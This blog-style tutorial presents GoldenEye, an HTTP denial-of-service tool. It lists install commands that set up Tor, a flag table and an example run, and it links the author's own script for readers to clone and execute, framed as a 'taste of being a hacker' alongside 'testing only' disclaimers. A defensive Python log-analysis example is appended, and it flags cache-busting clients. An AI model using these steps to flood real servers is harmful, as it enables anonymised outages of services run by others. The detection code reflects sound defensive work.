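Every day I get text messages from Alibaba Cloud saying my server has been attacked. That gave me the idea of stress-testing my own server myself. After searching around on GitHub, I found a project called GoldenEye. I'm sharing it here so you can get a taste of being a hacker. That said, someone who only knows DoS attacks is a fake hacker, crude and heavy-handed; becoming a real hacker still takes in-depth study.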
GoldenEye is a Python app for SECURITY TESTING PURPOSES ONLY!
GoldenEye is an HTTP DoS Test Tool.
Attack Vector exploited: HTTP Keep Alive + NoCache
This project is for DoS testing only; do not use it for anything else!
Test environment: CentOS 7.2
The steps are as follows:
```bash
yum install git wget -y
wget http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-9.noarch.rpm
rpm -ivh epel-release-7-9.noarch.rpm
yum install tor -y
git clone https://github.com/jseidl/GoldenEye.git
cd GoldenEye
chmod +x goldeneye.py
service tor start
./goldeneye.py <url> [OPTIONS]
```
Usage is simple too:
USAGE: ./goldeneye.py <url> [OPTIONS]
OPTIONS:
Flag | Description | Default |
---|---|---|
-u, --useragents | File with user-agents to use | (default: randomly generated) |
-w, --workers | Number of concurrent workers | (default: 50) |
-s, --sockets | Number of concurrent sockets | (default: 30) |
-m, --method | HTTP Method to use 'get' or 'post' or 'random' | (default: get) |
-d, --debug | Enable Debug Mode [more verbose output] | (default: False) |
-h, --help | Shows this help | |
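The “Strikes Deferred” value says how many strikes were blocked or crashed. The number in brackets says how many connections timed out or were answered with an error 500.
Example:
```bash
./goldeneye.py https://127.0.0.1 -w 200 -s 100
```
Once the test is running, keep an eye on the “Strikes Deferred” output: it is the number of strikes that were blocked or crashed, and the number in parentheses is the number of connection timeouts or error 500 responses.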
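The same test seen from the server being tested, as an added example (not part of the original post or of the GoldenEye project): a Python check over web access logs that flags clients requesting one path with a different query string almost every time. It assumes the NoCache vector appears that way in a combined-format access log; `flag_cache_busters`, its thresholds and the sample lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Combined-log-format prefix: client IP, timestamp, request line, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def flag_cache_busters(lines, min_requests=5, min_ratio=0.9):
    """Flag clients whose requests to one path almost always carry a new
    query string. Assumption: NoCache traffic looks like this in the log.
    Both thresholds are hypothetical; tune them per site."""
    seen = defaultdict(lambda: defaultdict(list))  # ip -> path -> [query, ...]
    errors = defaultdict(int)                      # ip -> number of 5xx replies
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of aborting the run
        parts = urlsplit(m["target"])
        seen[m["ip"]][parts.path].append(parts.query)
        if m["status"].startswith("5"):
            errors[m["ip"]] += 1
    flagged = {}
    for ip, paths in seen.items():
        for path, queries in paths.items():
            distinct = {q for q in queries if q}
            if len(queries) < min_requests or not distinct:
                continue
            ratio = len(distinct) / len(queries)
            if ratio >= min_ratio:
                flagged[ip] = {"path": path, "requests": len(queries),
                               "unique_ratio": round(ratio, 2), "5xx": errors[ip]}
    return flagged

# Constructed sample log lines (not captured from a real test run).
SAMPLE = [
    f'203.0.113.7 - - [10/Oct/2017:13:55:{i:02d} +0800] '
    f'"GET /?k{i}=v{i * 7} HTTP/1.1" {500 if i > 4 else 200} 512'
    for i in range(8)
] + [
    f'198.51.100.9 - - [10/Oct/2017:13:56:{i:02d} +0800] '
    '"GET /index.html?page=1 HTTP/1.1" 200 2048'
    for i in range(8)
] + ['not an access-log line']

if __name__ == "__main__":
    for ip, stats in flag_cache_busters(SAMPLE).items():
        print(ip, stats)
```

The 5xx count per flagged client is the server-side counterpart of the number the tool prints in parentheses.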
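I wrote a clumsy script for CentOS 7; see https://github.com/zyl6698/Goldendos
Usage:
```bash
git clone https://github.com/zyl6698/Goldendos && cd Goldendos
chmod +x hack1.0.sh
./hack1.0.sh
```
Enjoy!
It also ran successfully on a Raspberry Pi, so anyone who has one can give it a try.
To state it once more: this project may only be used for learning and testing, and not for anything else!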